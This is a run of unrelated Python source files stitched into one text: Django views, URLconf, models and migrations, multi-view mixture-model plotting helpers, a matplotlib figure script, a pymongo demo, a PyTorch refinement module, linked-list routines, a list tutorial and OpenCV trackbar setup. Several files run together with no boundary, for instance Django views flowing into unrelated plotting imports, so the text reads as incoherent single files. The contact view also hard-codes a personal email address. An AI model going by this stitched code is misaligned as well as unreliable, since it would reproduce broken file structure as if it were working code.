    def test_metadata_fonts_fields_have_fontname(self):
        """ METADATA.json fonts items fields "name", "postScriptName",
        "fullName", "filename" contain the font name in the right format """
        for x in self.metadata.fonts:
            font = Font.get_ttfont_from_metadata(self.operator.path, x)
            self.assertIn(font.familyname, x.name)
            self.assertIn(font.familyname, x.full_name)
            # filename and postScriptName use the family name with spaces removed.
            self.assertIn("".join(str(font.familyname).split()),
                          x.filename)
            self.assertIn("".join(str(font.familyname).split()),
                          x.post_script_name)
|
# Create your views here.
from django.http import HttpResponse,HttpResponseRedirect
from django.shortcuts import render,get_object_or_404,render_to_response
from django.utils import timezone
from django.core.context_processors import csrf
from django import forms
from django.template import RequestContext
from core.models import Entry
from core.forms import ContactForm
def index(request):
    """Minimal plain-text index view."""
    body = 'I love'
    return HttpResponse(body)
def home(request):
    """Contact-form view: validate, persist an Entry, then redirect to '/'.

    Uses the legacy ``django.core.context_processors.csrf`` API, so this
    targets an old Django version.
    """
    # return HttpResponse('I love')
    # NOTE(review): `c` is built with the CSRF token but never passed to
    # the template — confirm whether it is still needed.
    c = {}
    c.update(csrf(request))
    if request.method == 'POST': # If the form has been submitted...
        form = ContactForm(request.POST) # A form bound to the POST data
        if form.is_valid():
            email = form.cleaned_data['email']
            name = form.cleaned_data['name']
            message = form.cleaned_data['text']
            comments = form.cleaned_data['comments']
            recipients = ['troush69@gmail.com']
            # Persist the submission; mailing is currently disabled below.
            e = Entry(email=form.cleaned_data['email'],name=form.cleaned_data['name'],text=form.cleaned_data['text'],comments=form.cleaned_data['comments'],pub_date=timezone.now())
            e.save()
            # from django.core.mail import send_mail
            # send_mail(name, message.join(comments), 'troush69@gmail.com',recipients)
            return HttpResponseRedirect('/') # Redirect after POST
    else:
        form = ContactForm() # An unbound form
    return render_to_response('home.html', {
        'form': form,
    }, RequestContext(request))
def content(request):
    """Render the static content page.

    The original passed ``locals()`` as the template context — an opaque
    idiom; the explicit dict below is equivalent, since ``request`` was
    the only local name in scope.
    """
    return render(request, 'content.html', {'request': request})
from os.path import join
from joblib import load
import os
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
from mvmm.multi_view.block_diag.graph.bipt_community import community_summary
from mvmm.multi_view.block_diag.graph.linalg import eigh_Lsym_bp
from mvmm.clustering_measures import MEASURE_MIN_GOOD
from mvmm.linalg_utils import pca
from mvmm_sim.simulation.opt_viz import plot_loss_history
from mvmm_sim.simulation.sim_viz import save_fig
from mvmm_sim.viz_utils import draw_ellipse
def plot_mvmm_model_selection(model_sel_df, group_var,
                              group_var_label=None, select_metric='bic',
                              cmap="Set2"):
    """Plot one model-selection curve per 'view_comp_idx' group.

    Parameters
    ----------
    model_sel_df : pandas.DataFrame
        Must contain columns 'view_comp_idx', 'n_view_comp', `group_var`,
        `select_metric`, and 'n_blocks_est'/'n_comp_est' (for the title).
    group_var : str
        Column plotted on the x-axis.
    group_var_label : str or None
        Axis label; defaults to `group_var`.
    select_metric : str
        Metric column; the best model is picked by min or max according
        to MEASURE_MIN_GOOD.
    cmap : str
        Seaborn palette name used to color the per-group curves.
    """
    all_view_comp_idxs = np.unique(model_sel_df['view_comp_idx'])
    colors = sns.color_palette(cmap, len(all_view_comp_idxs))
    if group_var_label is None:
        group_var_label = group_var
    for i, view_comp_idx in enumerate(all_view_comp_idxs):
        df = model_sel_df.query("view_comp_idx == @view_comp_idx")
        df = df.sort_values(group_var)
        color = colors[i]
        plt.plot(df[group_var], df[select_metric],
                 marker='.', color=color, alpha=.5)
        plt.xlabel(group_var_label)
        plt.ylabel(select_metric)
        # label n view comp curves
        x_coord = max(df[group_var])
        y_coord = df[select_metric].values[-1]
        text = df['n_view_comp'].values[0]
        plt.text(x=x_coord, y=y_coord, s=text, color=color)
    # Pick the best row by the metric's direction (smaller- or larger-is-better).
    if MEASURE_MIN_GOOD[select_metric]:
        sel_idx = model_sel_df[select_metric].idxmin()
    else:
        sel_idx = model_sel_df[select_metric].idxmax()
    sel_row = model_sel_df.loc[sel_idx]
    plt.title('{} selected {}\n n_blocks {}, n_comp {}'.
              format(select_metric,
                     sel_row['n_view_comp'],
                     sel_row['n_blocks_est'],
                     sel_row['n_comp_est']))
def plot_Pi(Pi, mask=None, cmap="Blues", cbar=True, square=True,
            force_annot_off=False, linewidths=0):
    """
    Heatmap of an estimated Pi matrix.

    The matrix is transposed before plotting so the first view runs along
    the columns and the second view along the rows.
    """
    # TODO: allow for labels on each axis
    # Annotate cells with values only for small matrices (unless disabled).
    annot = (not force_annot_off) and max(Pi.shape) <= 10
    transposed_mask = None if mask is None else mask.T
    sns.heatmap(Pi.T, square=square, cbar=cbar, vmin=0, cmap=cmap,
                annot=annot, fmt='.3f', mask=transposed_mask,
                linewidths=linewidths,
                xticklabels=True, yticklabels=True)
def plot_mvmm(mvmm, inches=8, save_dir=None):
    """
    Plots loss history and estimated Pi matrix.

    Parameters
    ----------
    mvmm :
        Fitted multi-view mixture model exposing ``opt_data_`` and
        ``weights_mat_``.
    inches : int
        Side length of the (square) Pi figure.
    save_dir : str or None
        If given, figures are saved there (directory is created).
    """
    if save_dir is not None:
        os.makedirs(save_dir, exist_ok=True)
    # TODO: maybe add Pi start
    loss_vals = mvmm.opt_data_['history']['loss_val']
    ################
    # Loss history #
    ################
    plot_loss_history(loss_vals,
                      loss_name='Observed data negative log-likelihood')
    if save_dir is not None:
        fpath = join(save_dir, 'loss_history.png')
        save_fig(fpath)
    ###############
    # Pi estimate
    ################
    plt.figure(figsize=(inches, inches))
    plot_Pi(mvmm.weights_mat_)
    plt.title("Estimated Pi")
    if save_dir is not None:
        fpath = join(save_dir, 'Pi_est.png')
        save_fig(fpath)
#######################
# Block diagonal MVMM #
#######################
def plot_bd_mvmm(mvmm, inches=8, save_dir=None):
    """
    Diagnostic plots for a fitted block-diagonal MVMM:
    initial BD weights, estimated BD weights, spectra of both,
    number of steps in each adaptive stage,
    eigenvalues over the entire path,
    and the loss history of each optimization segment.

    If `save_dir` is given, every figure is written there; otherwise the
    figures are only created (and the info dict is printed).
    """
    if save_dir is not None:
        os.makedirs(save_dir, exist_ok=True)
    info = get_bd_mvmm_info(mvmm)
    if save_dir is not None:
        # TODO: save this
        save_dir
    else:
        print(info)
    # BD weight estimate
    bd_weights = mvmm.bd_weights_
    zero_thresh = mvmm.zero_thresh
    summary, Pi_comm = community_summary(bd_weights, zero_thresh=zero_thresh)
    # Spectrum of the symmetric bipartite Laplacian of the weights.
    bd_weights_symlap_spec = eigh_Lsym_bp(bd_weights)[0]
    # initial BD weights (from the first adaptive-penalty segment)
    bd_weights_init = mvmm.opt_data_['adpt_opt_data']['adapt_pen_history']['opt_data'][0]['history']['init_params']['bd_weights']
    bd_weights_init_symlap_spec = eigh_Lsym_bp(bd_weights_init)[0]
    # optimization history
    adpt_history = mvmm.opt_data_['adpt_opt_data']['adapt_pen_history']['opt_data']
    if 'raw_eval_sum' in adpt_history[0]['history']:
        n_steps = [len(adpt_history[i]['history']['raw_eval_sum'])
                   for i in range(len(adpt_history))]
        n_steps_cumsum = np.cumsum(n_steps)
        raw_eval_sum = \
            np.concatenate([adpt_history[i]['history']['raw_eval_sum']
                            for i in range(len(adpt_history))])
    else:
        raw_eval_sum = None
        n_steps = None
        n_steps_cumsum = None
    obs_nll = np.concatenate([adpt_history[i]['history']['obs_nll']
                              for i in range(len(adpt_history))])
    if mvmm.opt_data_['ft_opt_data'] is not None:
        fine_tune_obs_nll = mvmm.opt_data_['ft_opt_data']['history']['obs_nll']
    else:
        fine_tune_obs_nll = None
    ######################
    # Initial BD weights #
    ######################
    plt.figure(figsize=(inches, inches))
    plot_Pi(bd_weights_init)
    plt.title('BD weights initial value')
    if save_dir is not None:
        fpath = join(save_dir, 'BD_weights_init.png')
        save_fig(fpath)
    ########################
    # Estimated BD weights #
    ########################
    plt.figure(figsize=(2 * inches, inches))
    plt.subplot(1, 2, 1)
    plot_Pi(bd_weights)
    plt.title('BD weights estimate, n_blocks={}'.
              format(summary['n_communities']))
    plt.subplot(1, 2, 2)
    # Same matrix, masked below the zero threshold to reveal the blocks.
    plot_Pi(bd_weights, mask=Pi_comm < zero_thresh)
    plt.title('BD weights estimate, block diagonal perm')
    if save_dir is not None:
        fpath = join(save_dir, 'BD_weights_est.png')
        save_fig(fpath)
    ##########################
    # Spectrum of BD weights #
    ##########################
    plt.figure(figsize=(inches, inches))
    idxs = np.arange(1, len(bd_weights_symlap_spec) + 1)
    plt.plot(idxs, bd_weights_symlap_spec, marker='.', label='Estimate')
    plt.plot(idxs, bd_weights_init_symlap_spec, marker='.', label="Initial")
    plt.title('BD weights estimate spectrum')
    plt.ylim(0)
    plt.legend()
    if save_dir is not None:
        fpath = join(save_dir, 'BD_weights_spectrum.png')
        save_fig(fpath)
    ##################################
    # Number of steps for each stage #
    ##################################
    if n_steps is not None:
        plt.figure(figsize=(inches, inches))
        idxs = np.arange(1, len(n_steps) + 1)
        plt.plot(idxs, n_steps, marker='.')
        plt.ylim(0)
        plt.ylabel("Number of steps")
        plt.xlabel("Adaptive stage")
        if save_dir is not None:
            fpath = join(save_dir, 'n_steps.png')
            save_fig(fpath)
    ###########################
    # Obs NLL for entire path #
    ###########################
    plt.figure(figsize=[inches, inches])
    plot_loss_history(obs_nll, loss_name="Obs NLL (entire path)")
    if save_dir is not None:
        fpath = join(save_dir, 'path_obs_nll.png')
        save_fig(fpath)
    #########################
    # Evals for entire path #
    #########################
    if raw_eval_sum is not None:
        plt.figure(figsize=[inches, inches])
        plt.plot(np.log10(raw_eval_sum), marker='.')
        plt.ylabel('log10(sum smallest evals)')
        plt.xlabel('step')
        plt.title('Eigenvalue history (entire path)')
        # Mark the boundary between adaptive segments.
        for s in n_steps_cumsum:
            plt.axvline(s - 1, color='grey')
        if save_dir is not None:
            fpath = join(save_dir, 'path_evals.png')
            save_fig(fpath)
    ###########################
    # Losses for each segment #
    ###########################
    if save_dir is not None:
        segment_dir = join(save_dir, 'segments')
        os.makedirs(segment_dir, exist_ok=True)
    for i in range(len(adpt_history)):
        loss_vals = adpt_history[i]['history']['loss_val']
        plot_loss_history(loss_vals, 'loss val, adapt segment {}'.
                          format(i + 1))
        if save_dir is not None:
            fpath = join(segment_dir, 'loss_history_{}.png'.format(i + 1))
            save_fig(fpath)
    ##########################
    # fine tune loss history #
    ##########################
    if fine_tune_obs_nll is not None:
        plot_loss_history(fine_tune_obs_nll, 'fine tune obs NLL')
        if save_dir is not None:
            fpath = join(segment_dir, 'fine_tune_loss_history.png')
            save_fig(fpath)
def get_bd_mvmm_info(mvmm):
    """Collect a summary dict of optimization metadata from a fitted BD-MVMM."""
    opt_data = mvmm.opt_data_
    # NOTE(review): the 'sucess'/'adpat_opt_runtime' typos are preserved —
    # downstream consumers may rely on these exact keys.
    info = {
        "sucess": opt_data['success'],
        "n_blocks_req": mvmm.n_blocks,
        "n_blocks_est": opt_data['n_blocks_est'],
        "adpat_opt_runtime": opt_data['adpt_opt_data']["runtime"],
    }
    ft_data = opt_data['ft_opt_data']
    if ft_data is not None:
        info["fine_tune_runtime"] = ft_data["runtime"]
    info['eval_pen_inits'] = opt_data['adpt_opt_data']['eval_pen_init']
    return info
def plot_log_pen_mvmm(mvmm, inches=8, save_dir=None):
    """Diagnostic plots for a fitted log-penalized MVMM.

    Plots the initial weights (when available), the estimated weights
    (plain and block-diagonal-masked), the Laplacian spectrum, and the
    observed-NLL / penalized-loss histories. Figures are saved to
    `save_dir` when it is given.
    """
    if save_dir is not None:
        os.makedirs(save_dir, exist_ok=True)
    # info = get_log_pen_mvmm_info(mvmm)
    # if save_dir is not None:
    #     # TODO: save this
    #     save_dir
    # else:
    #     print(info)
    Pi = mvmm.weights_mat_
    zero_thresh = 1e-10 # not sure if we need this
    summary, Pi_comm = community_summary(Pi, zero_thresh=zero_thresh)
    # Spectrum of the symmetric bipartite Laplacian of the weights.
    Pi_symlap_spec = eigh_Lsym_bp(Pi)[0]
    if 'init_params' in mvmm.opt_data_['history']:
        Pi_init = mvmm.opt_data_['history']['weights'].reshape(Pi.shape) # TODO: check this
        Pi_init_symlap_spec = eigh_Lsym_bp(Pi_init)[0]
    else:
        Pi_init = None
    obs_nll = mvmm.opt_data_['history']['obs_nll']
    loss_vals = mvmm.opt_data_['history']['loss_val']
    ####################
    # Initial weights #
    ###################
    if Pi_init is not None:
        plt.figure(figsize=(inches, inches))
        plot_Pi(Pi_init)
        plt.title('weights initial value')
        if save_dir is not None:
            fpath = join(save_dir, 'weights_init.png')
            save_fig(fpath)
    ######################
    # Estimated weights #
    ######################
    plt.figure(figsize=(2 * inches, inches))
    plt.subplot(1, 2, 1)
    plot_Pi(Pi)
    plt.title('weights estimate, n_blocks={}'.
              format(summary['n_communities']))
    plt.subplot(1, 2, 2)
    # Same matrix, masked below the zero threshold to reveal the blocks.
    plot_Pi(Pi, mask=Pi_comm < zero_thresh)
    plt.title('weights estimate, block diagonal perm')
    if save_dir is not None:
        fpath = join(save_dir, 'weights_est.png')
        save_fig(fpath)
    ##########################
    # Spectrum of BD weights #
    ##########################
    plt.figure(figsize=(inches, inches))
    idxs = np.arange(1, len(Pi_symlap_spec) + 1)
    plt.plot(idxs, Pi_symlap_spec, marker='.', label='Estimate')
    if Pi_init is not None:
        plt.plot(idxs, Pi_init_symlap_spec, marker='.', label="Initial")
    plt.title('weights estimate spectrum')
    plt.ylim(0)
    plt.legend()
    if save_dir is not None:
        fpath = join(save_dir, 'weights_spectrum.png')
        save_fig(fpath)
    ###########################
    # Obs NLL for entire path #
    ###########################
    plt.figure(figsize=[inches, inches])
    plot_loss_history(obs_nll,
                      loss_name="Obs NLL")
    if save_dir is not None:
        fpath = join(save_dir, 'obs_nll.png')
        save_fig(fpath)
    plt.figure(figsize=[inches, inches])
    plot_loss_history(loss_vals,
                      loss_name="log penalized obs nll")
    if save_dir is not None:
        fpath = join(save_dir, 'loss_vals.png')
        save_fig(fpath)
def plot_mvmm_pcs(mvmm, X, dataset_names=None):
    """Scatter-plot each view's data projected onto its first two PCs,
    coloured by the overall predicted cluster; each view-cluster mean is
    marked with an 'x' and, for diagonal covariances, an ellipse of the
    projected covariance is drawn.

    Parameters
    ----------
    mvmm : fitted multi-view mixture model; must provide predict(),
        n_components, n_view_components, view_models_ and
        _get_view_clust_idx().
    X : list of two per-view data matrices (one subplot per view).
    dataset_names : optional list of two view names.
        NOTE(review): currently assigned a default but never used below.
    """
    if dataset_names is None:
        dataset_names = ['view 1', 'view 2']
    y_pred = mvmm.predict(X)
    n_comp = mvmm.n_components
    n_view_comps = mvmm.n_view_components
    # One colour per overall cluster; each view cluster inherits the
    # colour of the overall cluster it belongs to.
    overall_clust_colors = sns.color_palette("Set2", n_comp)
    data_colors = np.array(overall_clust_colors)[y_pred]
    view_clust_colors = [[None for _ in range(n_view_comps[0])],
                         [None for _ in range(n_view_comps[1])]]
    for k in range(n_comp):
        col = overall_clust_colors[k]
        k0, k1 = mvmm._get_view_clust_idx(k)
        view_clust_colors[0][k0] = col
        view_clust_colors[1][k1] = col
    for v in range(len(X)):
        # get first two PCs of data
        # TODO: should we standardize data first or something
        U, D, V, m = pca(X[v], rank=2)
        # project data and means onto PCs
        proj_data = X[v] @ V  # U * D
        gmm = mvmm.view_models_[v]
        proj_means = gmm.means_ @ V  # (gmm.means_ - m) @ V
        # data_colors = 'black'
        # plt.figure(figsize=(8, 8))
        plt.subplot(1, 2, v + 1)
        plt.scatter(proj_data[:, 0], proj_data[:, 1], color=data_colors, s=10)
        for j in range(n_view_comps[v]):
            plt.scatter(proj_means[j, 0], proj_means[j, 1],
                        marker='x', s=200, lw=5,
                        color=view_clust_colors[v][j])
            # get class covariance
            if gmm.covariance_type == 'diag':
                cov = np.diag(gmm.covariances_[j])
                # project covariance matrix onto PCs
                proj_cov = (V.T @ cov @ V)  # TODO: does this make sense
                draw_ellipse(position=proj_means[j, :], covariance=proj_cov,
                             facecolor='none',
                             edgecolor=view_clust_colors[v][j], lw=1)
        plt.xlabel('PC 1')
        plt.ylabel('PC 2')
|
# coding:utf-8
# This program is used to show the curves of Figure 2 in the paper
import numpy as np
import matplotlib.pyplot as plt

# The font size on the graph we will plot
size_font = 18
# The marker size on the graph we will plot
size_marker = 9

# Each line of the data file holds four comma-separated columns:
# sample size, empirical risk, test risk and (test - empirical) risk.
# np.loadtxt parses and converts them to float in one pass, and the
# with-block guarantees the file is closed even if parsing fails (the
# original left the handle open on a conversion error).
with open("../Data/SampleIncrease.txt") as f:
    data = np.loadtxt(f, delimiter=",")
sample_num_data = data[:, 0]
emp_data = data[:, 1]
emp_test_data = data[:, 2]
emp_test_minus_emp_data = data[:, 3]
print(sample_num_data)
print(emp_data)
print(emp_test_data)
print(emp_test_minus_emp_data)

# Graphic display: only the first 14 sample sizes are shown.
plt.figure(figsize=(12, 7))
plt.plot(sample_num_data[0:14], emp_test_data[0:14], 'bo', linestyle='--',
         label='Test distributed error', markersize=size_marker)
plt.plot(sample_num_data[0:14], emp_test_minus_emp_data[0:14], 'rs', linestyle=':',
         label='Difference', markersize=size_marker)
# Highlight two specific data points with yellow squares and their values.
show_value1 = str(0.06853)
plt.annotate(show_value1, xytext=(7500, 0.074), xy=(8000, 0.068534939767174))
plt.plot(8000, 0.068534939767174, 'ys')
show_value2 = str(0.05762)
plt.annotate(show_value2, xytext=(9500, 0.063), xy=(10000, 0.057624356515303045))
plt.plot(10000, 0.057624356515303045, 'ys')
# Plotting the x label
plt.xticks(fontsize=size_font)
plt.xlabel("Size of samples", fontsize=size_font)
# Plotting the y label
plt.yticks(fontsize=size_font)
plt.ylabel("Risk / Error", fontsize=size_font)
plt.legend(fontsize=size_font, loc='upper right')
plt.show()
|
from django.conf.urls.defaults import *
from django.views.generic.simple import direct_to_template
from django.views.generic.list_detail import object_list
from stereoit.djangoapps.news.models import News

# Shared queryset handed to the generic list view below.
news_dict = {
    'queryset' : News.objects.all()
}

# NOTE(review): django.conf.urls.defaults and the function-based generic
# views used here were removed in later Django releases; this URLconf
# targets the old (pre-1.6) API and must not be ported piecemeal.
urlpatterns = patterns('stereoit.djangoapps.news.views',
    # (r'show/1/$', 'news_test'), #show news detail
    # Static front page rendered straight from a template.
    (r'^$', direct_to_template, {'template': 'news/index.html'}),
    # Paginated archive of all news items, 20 per page.
    (r'^archive/$', object_list, dict(
        news_dict,
        paginate_by=20,
        template_object_name='news',
    )),
    url(r'^(?P<slug>[-\w]+)$', 'detail', name="news_detail"), #show news detail
)
|
#!env python3
# -*- coding: utf-8 -*-
"""Load a few Nobel-winner records into MongoDB and run sample queries."""
from pymongo import MongoClient

nobel_winners = [{
    'category': 'Physics',
    'name': 'Albert Einstein',
    'nationality': 'Swiss',
    'sex': 'male',
    'year': 1921
}, {
    'category': 'Physics',
    'name': 'Paul Dirac',
    'nationality': 'British',
    'sex': 'male',
    'year': 1933
}, {
    'category': 'Chemistry',
    'name': 'Marie Curie',
    'nationality': 'Polish',
    'sex': 'female',
    'year': 1911
}]

client = MongoClient('localhost', 27017)
db = client.nobel_prize
coll = db.winners
# Collection.insert() was deprecated in PyMongo 3 and removed in PyMongo 4;
# insert_many() is the supported bulk-insert API and inserts the same docs.
coll.insert_many(nobel_winners)
print(nobel_winners)
res = coll.find({'category':'Chemistry'})
print(list(res))
# NOTE(review): the second argument of find() is a *projection*, not a
# filter; {'sex': 'female'} is merely truthy so it includes the 'sex'
# field in the output.  If the intent was "female winners after 1930",
# 'sex' belongs in the filter document instead - confirm with the author.
res = coll.find({'year':{'$gt':1930}}, {'sex':'female'})
print(list(res))
|
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.init as init
from torch.utils import data
import torch.utils.model_zoo as model_zoo
from torchvision import models
class Refine(nn.Module):
    """Refinement head: fuses a skip feature map `f` with an upsampled
    coarser mask/feature `pm` through two residual 3x3-conv blocks.

    Args:
        inplanes: channels of the skip feature `f`.
        planes: channels used internally and returned.
        scale_factor: spatial upsampling factor applied to `pm` (default 2).
    """

    def __init__(self, inplanes, planes, scale_factor=2):
        super(Refine, self).__init__()
        # All convs are 3x3 with padding=1, so spatial size is preserved.
        self.convFS1 = nn.Conv2d(inplanes, planes, kernel_size=3, padding=1)
        self.convFS2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)
        self.convFS3 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)
        self.convMM1 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)
        self.convMM2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)
        self.scale_factor = scale_factor

    def forward(self, f, pm):
        """Return refined features: (residual(f) + upsample(pm)) refined
        by a second residual block; output has `planes` channels and the
        spatial size of `f`."""
        # Residual block on the skip feature.
        s = self.convFS1(f)
        sr = self.convFS2(F.relu(s))
        sr = self.convFS3(F.relu(sr))
        s = s + sr
        # F.upsample is a deprecated alias of F.interpolate (removed in
        # recent PyTorch); interpolate with identical arguments behaves
        # exactly the same.
        m = s + F.interpolate(pm, scale_factor=self.scale_factor,
                              mode='bilinear')
        # Second residual block on the merged map.
        mr = self.convMM1(F.relu(m))
        mr = self.convMM2(F.relu(mr))
        m = m + mr
        return m
from SingleLinkList import SingleLinkList
def find_common_node1(singlelinklistA, singlelinklistB):
    """
    Approach 1: push the elements of both singly linked lists onto two
    stacks, then pop both stacks in lockstep; the last pair of equal
    elements popped is the first common node of the two lists.

    NOTE: both input lists are consumed (emptied) by this function.
    Returns None when the lists share no common tail.
    """
    stack_A = []
    stack_B = []
    same_item = []
    while not singlelinklistA.isEmpty():
        stack_A.append(singlelinklistA.pop_head())
    while not singlelinklistB.isEmpty():
        stack_B.append(singlelinklistB.pop_head())
    while stack_A and stack_B:
        if stack_A[-1] == stack_B[-1]:
            same_item.append(stack_A.pop())
            stack_B.pop()
        else:
            # BUG FIX: the original had no else-branch, so when the tops
            # differed nothing was popped and the loop spun forever.
            break
    # BUG FIX: guard against lists with no common tail instead of
    # raising IndexError on same_item[-1].
    return same_item[-1] if same_item else None
def find_common_node2(singlelinklistA, singlelinklistB):
    """
    Approach 2: advance the head of the longer list by the difference of
    the two lengths, then pop both lists in lockstep and return the first
    equal pair of values, which is the first common node.

    NOTE: both input lists are consumed by this function.
    Returns None when the lists share no common node.
    """
    lenA = singlelinklistA.len()
    lenB = singlelinklistB.len()
    if lenA > lenB:
        k = lenA - lenB
        while k:
            singlelinklistA.pop_head()
            k -= 1
    else:
        k = lenB - lenA
        while k:
            singlelinklistB.pop_head()
            # BUG FIX: the original never decremented k in this branch,
            # so the loop spun forever whenever list B was longer.
            k -= 1
    while not singlelinklistA.isEmpty() and not singlelinklistB.isEmpty():
        numA = singlelinklistA.pop_head()
        numB = singlelinklistB.pop_head()
        if numA == numB:
            return numA
    return None
def main():
    """Demo: list A holds 0..10 and list B holds 3..10, so the shared
    tail starts at value 3 - the first common node.

    Key observation: every element after the first common node is
    identical in both lists.
    """
    list_a = SingleLinkList()
    list_b = SingleLinkList()
    for value in range(11):
        list_a.append(value)
    for value in range(3, 11):
        list_b.append(value)
    print(find_common_node2(list_a, list_b))


if __name__ == '__main__':
    main()
|
from django.contrib import admin
from .models import Region, Country
# Expose the geography models in the Django admin with the default
# ModelAdmin options (same registration order as before).
for _model in (Region, Country):
    admin.site.register(_model)
from django.db import models
from django.utils.translation import ugettext as _
from django.core.validators import MaxValueValidator, MinValueValidator
class ThomCurrency(models.Model):
    """Reference table of currencies, keyed by the currency code."""
    currency = models.CharField(max_length=5, primary_key=True, verbose_name=_("Currency"))
    currency_name = models.CharField(max_length=50, verbose_name=_("Currency Name"))

    def __str__(self):
        # Rendered as e.g. "(USD)-US Dollar".
        return '({0})-{1}'.format(self.currency, self.currency_name)

    class Meta:
        app_label = 'filab'
        db_table = 'thom_currency'
class ThomDailyCurrency(models.Model):
    """One sentiment/analytics reading for a currency at a date+time,
    split by data source (all / news / social).

    Per the validators: scores such as sentiment, optimism, trust,
    conflict, urgency, price, priceforecast, currencypeginstability and
    pricemomentum lie in [-1, 1]; fear, joy, violence, uncertainty and
    carrytrade lie in [0, 1].  buzz is unconstrained.
    """
    SOURCE_CHOICES = (
        ('all',_('All'),),
        ('news',_('News'),),
        ('social',_('Social'),),
    )
    # Externally supplied row identifier (40 chars - presumably a hash;
    # TODO confirm against the data loader).
    rowid = models.CharField(primary_key=True, max_length=40)
    currency = models.ForeignKey(ThomCurrency,db_column='currency', verbose_name=_("Currency"))
    date = models.DateField(verbose_name=_("Date"))
    time = models.TimeField(verbose_name=_("Time"))
    source = models.CharField(max_length=10, choices=SOURCE_CHOICES, verbose_name=_("Source"))
    buzz = models.FloatField(verbose_name=_("Buzz"), blank=True, null=True)
    sentiment = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Sentiment"), blank=True, null=True)
    optimism = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Optimism"), blank=True, null=True)
    fear = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(0)], verbose_name=_("Fear"), blank=True, null=True)
    joy = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(0)], verbose_name=_("Joy"), blank=True, null=True)
    trust = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Trust"), blank=True, null=True)
    violence = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(0)], verbose_name=_("Violence"), blank=True, null=True)
    conflict = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Conflict"), blank=True, null=True)
    urgency = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Urgency"), blank=True, null=True)
    uncertainty = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(0)], verbose_name=_("Uncertainty"), blank=True, null=True)
    price = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Price"), blank=True, null=True)
    priceforecast = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Price Forecast"), blank=True, null=True)
    carrytrade = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(0)], verbose_name=_("Carry Trade"), blank=True, null=True)
    currencypeginstability = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Currency Pegin Stability"), blank=True, null=True)
    pricemomentum = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Price Momentum"), blank=True, null=True)

    class Meta:
        app_label = 'filab'
        db_table = 'thom_dailycurrency'
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Initial migration for the User app: creates the Fields, Tool and
    ToolLocation tables.

    NOTE(review): auto-generated migrations that have been applied must
    not be hand-edited; create a new migration for schema changes.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Fields: a typed argument/parameter attached to a Tool.
        migrations.CreateModel(
            name='Fields',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=500)),
                ('created_at', models.DateTimeField(auto_now=True)),
                ('description', models.TextField()),
                ('type', models.CharField(max_length=500, verbose_name=b'Type of argument', choices=[(b'FT', b'File Type'), (b'INT', b'Integer Type'), (b'FLT', b'Float Type'), (b'STR', b'String Type')])),
                ('env', models.CharField(help_text=b'Specify env var as name=$value', max_length=100000, verbose_name=b'Env variables')),
            ],
            options={
                'verbose_name': 'Field',
                'verbose_name_plural': 'Fields',
            },
        ),
        # Tool: an uploaded executable/script owned by a user.
        migrations.CreateModel(
            name='Tool',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=500)),
                ('created_at', models.DateTimeField(auto_now=True)),
                ('description', models.TextField()),
                ('usage', models.TextField()),
                ('file', models.FileField(upload_to=b'', verbose_name=b'Upload the file of the tool')),
                ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # ToolLocation: where a Tool is deployed/stored.
        migrations.CreateModel(
            name='ToolLocation',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('location', models.TextField()),
                ('tool', models.ForeignKey(to='User.Tool')),
            ],
        ),
        # Link each Fields row back to its Tool.
        migrations.AddField(
            model_name='fields',
            name='tool',
            field=models.ForeignKey(to='User.Tool'),
        ),
    ]
|
# Lists: creation, indexing, mutation, heterogeneity and slicing.
a = [1, 2, 3, 4, 5, 6]  # a list literal built with [] brackets
print(a)        # print the whole list
print(a[0])     # print a single element by index
a[0] = 19       # lists are mutable: replace the first element
print(a)

# A single list may mix items of different types.
b = [19, "sarthak", "python developer", False, 6.8]
print(b)

# Slicing works exactly like string slicing.
print(b[1])
print(b[0:3])
#!/usr/bin/env python
# coding: utf-8
# In[2]:
import cv2
# In[3]:
def nothing(x):
    """No-op callback required by cv2.createTrackbar; the new trackbar
    value is ignored (positions are polled with getTrackbarPos instead)."""
    return None
# Two preview windows; each gets its own set of trackbars below.
cv2.namedWindow('threshold')
cv2.namedWindow('canny')
# add ON/OFF switch to "canny" - note the label string doubles as the
# trackbar's lookup name used with getTrackbarPos later.
switch_c = '0 : OFF \n1 : ON'
switch_t = '0 : OFF \n1 : ON'
cv2.createTrackbar(switch_c, 'canny', 0, 1, nothing)
cv2.createTrackbar(switch_t, 'threshold', 0, 1, nothing)
# add lower and upper threshold slidebars to "canny" (0..255), and a
# single max-value slider to "threshold".
cv2.createTrackbar('lower', 'canny', 0, 255, nothing)
cv2.createTrackbar('upper', 'canny', 0, 255, nothing)
cv2.createTrackbar('value', 'threshold', 0, 255, nothing)
